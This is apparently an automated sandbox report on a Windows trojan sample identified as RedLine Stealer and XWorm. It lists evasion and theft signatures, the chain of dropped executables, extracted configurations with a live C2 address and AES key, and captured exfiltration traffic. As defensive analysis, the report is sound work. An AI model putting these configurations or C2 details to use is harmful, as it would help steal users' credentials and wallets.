Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KR6CT3hIxT.exe

Overview

General Information

Sample name:KR6CT3hIxT.exe
renamed because original name is a hash value
Original sample name:5c95d5493dda877b228a6485a6d40d9c.exe
Analysis ID:1447590
MD5:5c95d5493dda877b228a6485a6d40d9c
SHA1:185482dabc06787f6ce14c6cd46c17372a1b77ae
SHA256:fdb5b2a0041b0939552ecd31e382e28529313c8bc8a656eb7de1cef9fbd6eee9
Tags:64exetrojan
Infos:

Detection

RedLine, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • KR6CT3hIxT.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\KR6CT3hIxT.exe" MD5: 5C95D5493DDA877B228A6485A6D40D9C)
    • 4.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Local\Temp\4.exe" MD5: D7E09993B21575A255D4CEAF706C205A)
      • 3.exe (PID: 7308 cmdline: "C:\Users\user\AppData\Local\Temp\3.exe" MD5: 215F503316C98618DC6DB327477FD26F)
        • rdegje.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Temp\rdegje.exe" MD5: 823F263A3D860454EF8092594FFB7EC0)
          • r.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Temp\r.exe" MD5: CF1A74B1E40E5C34DF68ADD35DA92129)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["195.2.75.12"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": ["195.2.75.12:54762"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x6a70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x6b0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x6c22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x68e2:$cnc4: POST / HTTP/1.1
        00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x133ca:$a4: get_ScannedWallets
            • 0x12228:$a5: get_ScanTelegram
            • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
            • 0x10e6a:$a7: <Processes>k__BackingField
            • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1079e:$a9: <ScanFTP>k__BackingField
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            2.2.3.exe.f10000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              2.2.3.exe.f10000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x6e70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x6f0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x7022:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x6ce2:$cnc4: POST / HTTP/1.1
              7.2.r.exe.e10000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.r.exe.e10000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  7.2.r.exe.e10000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x137ca:$a4: get_ScannedWallets
                  • 0x12628:$a5: get_ScanTelegram
                  • 0x1344e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1126a:$a7: <Processes>k__BackingField
                  • 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x10b9e:$a9: <ScanFTP>k__BackingField
                  Click to see the 1 entries
                  No Sigma rule has matched
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\3.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                  Source: C:\Users\user\AppData\Local\Temp\r.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                  Source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["195.2.75.12"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                  Source: 7.2.r.exe.e10000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["195.2.75.12:54762"], "Bot Id": "cheat"}
                  Source: C:\Users\user\AppData\Local\Temp\3.exeReversingLabs: Detection: 48%
                  Source: C:\Users\user\AppData\Local\Temp\3.exeVirustotal: Detection: 55%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\4.exeReversingLabs: Detection: 40%
                  Source: C:\Users\user\AppData\Local\Temp\4.exeVirustotal: Detection: 43%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\r.exeReversingLabs: Detection: 52%
                  Source: C:\Users\user\AppData\Local\Temp\r.exeVirustotal: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeVirustotal: Detection: 35%Perma Link
                  Source: KR6CT3hIxT.exeReversingLabs: Detection: 36%
                  Source: KR6CT3hIxT.exeVirustotal: Detection: 55%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\3.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\4.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\r.exeJoe Sandbox ML: detected
                  Source: KR6CT3hIxT.exeJoe Sandbox ML: detected
                  Source: 2.2.3.exe.f10000.0.unpackString decryptor: 195.2.75.12
                  Source: 2.2.3.exe.f10000.0.unpackString decryptor: 7000
                  Source: 2.2.3.exe.f10000.0.unpackString decryptor: <123456789>
                  Source: 2.2.3.exe.f10000.0.unpackString decryptor: <Xwormmm>
                  Source: 2.2.3.exe.f10000.0.unpackString decryptor: XWorm V5.6
                  Source: 2.2.3.exe.f10000.0.unpackString decryptor: USB.exe
                  Source: KR6CT3hIxT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4.exe, 00000001.00000000.1688378562.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, 4.exe, 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, rdegje.exe, 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe, 00000006.00000000.1938407320.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe.2.dr, 4.exe.0.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar-x64-701.exe.0.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: KR6CT3hIxT.exe
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 3.exe, 00000002.00000002.4149852444.0000000000F20000.00000040.00000001.01000000.0000000A.sdmp, r.exe, 00000007.00000002.2159322752.0000000000E30000.00000040.00000001.01000000.0000000D.sdmp
                  Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64-701.exe.0.dr
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DDB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DDB190
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DC40BC
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DEFCA0 FindFirstFileExA,0_2_00007FF7E1DEFCA0
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B6BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00B6BA94
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B7D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00B7D420
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EDBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,6_2_00EDBA94
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EED420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,6_2_00EED420

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 195.2.75.12
                  Source: Malware configuration extractorURLs: 195.2.75.12:54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 54762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 49740
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 195.2.75.12:7000
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 195.2.75.12:54762Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 195.2.75.12:54762Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 195.2.75.12:54762Content-Length: 930799Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 195.2.75.12:54762Content-Length: 930791Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.75.12
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 195.2.75.12:54762Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: r.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.2.75.12:54762
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.2.75.12:54762/
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                  Source: r.exe, 00000007.00000002.2159196933.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adp/1.0/
                  Source: r.exe, 00000007.00000002.2159196933.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsofo/1.2/
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: 3.exe, 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: r.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: winrar-x64-701.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                  Source: r.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
                  Source: r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                  Source: r.exeString found in binary or memory: https://api.ipify.orgcookies//setti
                  Source: r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                  Source: r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
